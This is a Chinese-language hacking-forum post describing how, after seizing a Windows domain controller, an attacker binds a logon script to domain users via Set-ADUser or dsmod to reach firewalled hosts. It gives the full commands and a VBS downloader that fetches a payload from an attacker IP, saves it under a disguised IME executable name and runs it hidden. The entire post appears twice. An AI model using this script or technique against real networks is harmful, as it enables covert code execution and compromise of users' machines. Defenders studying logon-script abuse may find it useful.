taibeihacker
Moderator
0x1、利用場景
當獲取到域控權限或domain admin等高權限時,想橫向到域內PC主機上對方開啟了防火牆,無法通過445、135進行橫向利用,可以通過登錄腳本綁定的方式獲取目標主機權限。
0x2、利用方法
方法一、powershell win2012及以上自帶,獲取當前域用戶信息
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
綁定指定用戶
Set-ADUser -Identity zhangsan -ScriptPath 'download.vbs'
解綁
Set-ADUser -Identity zhangsan -ScriptPath ' '
方法二、利用dsmod進行綁定
dsmod user -loscr'download.vbs''CN=john,CN=Users,DC=redteam,DC=com'
解綁
dsmod user -loscr '' 'CN=john,CN=Users,DC=redteam,DC=com'
刷新組策略
shell gpupdate /force
VBS內容
strFileURL='http://192.168.172.129:82/logo.ico'strHDLocation='C:\Users\Public\Documents\ChsIME.exe'Set objXMLHTTP=CreateObject('MSXML2.XMLHTTP')objXMLHTTP.open'GET', strFileURL,falseobjXMLHTTP.send()If objXMLHTTP.Status=200 ThenSet objADOStream=CreateObject('ADODB.Stream')objADOStream.OpenobjADOStream.Type=1 'adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position=0'Set the stream position to the startSet objFSO=Createobject('Scripting.FileSystemObject')If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO=NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream=NothingEndifSet objXMLHTTP=NothingstrComputer='.'setws=wscript.createobject('wscript.shell')val=ws.run ('C:\Users\Public\Documents\ChsIME.exe',0)
上傳至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目錄下,通過方法一或方法二進行綁定後刷新組策略即可
當獲取到域控權限或domain admin等高權限時,想橫向到域內PC主機上對方開啟了防火牆,無法通過445、135進行橫向利用,可以通過登錄腳本綁定的方式獲取目標主機權限。
0x2、利用方法
方法一、powershell win2012及以上自帶,獲取當前域用戶信息
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
綁定指定用戶
Set-ADUser -Identity zhangsan -ScriptPath 'download.vbs'
解綁
Set-ADUser -Identity zhangsan -ScriptPath ' '
方法二、利用dsmod進行綁定
dsmod user -loscr'download.vbs''CN=john,CN=Users,DC=redteam,DC=com'
解綁
dsmod user -loscr '' 'CN=john,CN=Users,DC=redteam,DC=com'
刷新組策略
shell gpupdate /force
VBS內容
strFileURL='http://192.168.172.129:82/logo.ico'strHDLocation='C:\Users\Public\Documents\ChsIME.exe'Set objXMLHTTP=CreateObject('MSXML2.XMLHTTP')objXMLHTTP.open'GET', strFileURL,falseobjXMLHTTP.send()If objXMLHTTP.Status=200 ThenSet objADOStream=CreateObject('ADODB.Stream')objADOStream.OpenobjADOStream.Type=1 'adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position=0'Set the stream position to the startSet objFSO=Createobject('Scripting.FileSystemObject')If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO=NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream=NothingEndifSet objXMLHTTP=NothingstrComputer='.'setws=wscript.createobject('wscript.shell')val=ws.run ('C:\Users\Public\Documents\ChsIME.exe',0)
上傳至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目錄下,通過方法一或方法二進行綁定後刷新組策略即可